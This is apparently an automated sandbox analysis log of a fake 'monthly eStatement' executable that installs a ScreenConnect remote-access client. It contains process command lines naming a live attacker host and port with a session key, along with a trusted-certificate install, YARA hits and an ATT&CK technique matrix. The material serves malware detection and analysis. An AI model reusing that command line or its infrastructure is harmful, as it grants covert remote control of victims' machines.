                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\o0ajlz89.o67\32b9qcnc.lyy\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\o0ajlz89.o67\32b9qcnc.lyy\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\o0ajlz89.o67\32b9qcnc.lyy\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1BD4 cpuid 0_2_009A1BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009A1806
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.ba0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 6172, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 5764, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  2
                  Windows Service
                  2
                  Windows Service
                  1
                  Install Root Certificate
                  Security Account Manager34
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job
                  12
                  Process Injection
                  1
                  Timestomp
                  NTDS51
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit
                  1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking
                  Cached Domain Credentials51
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
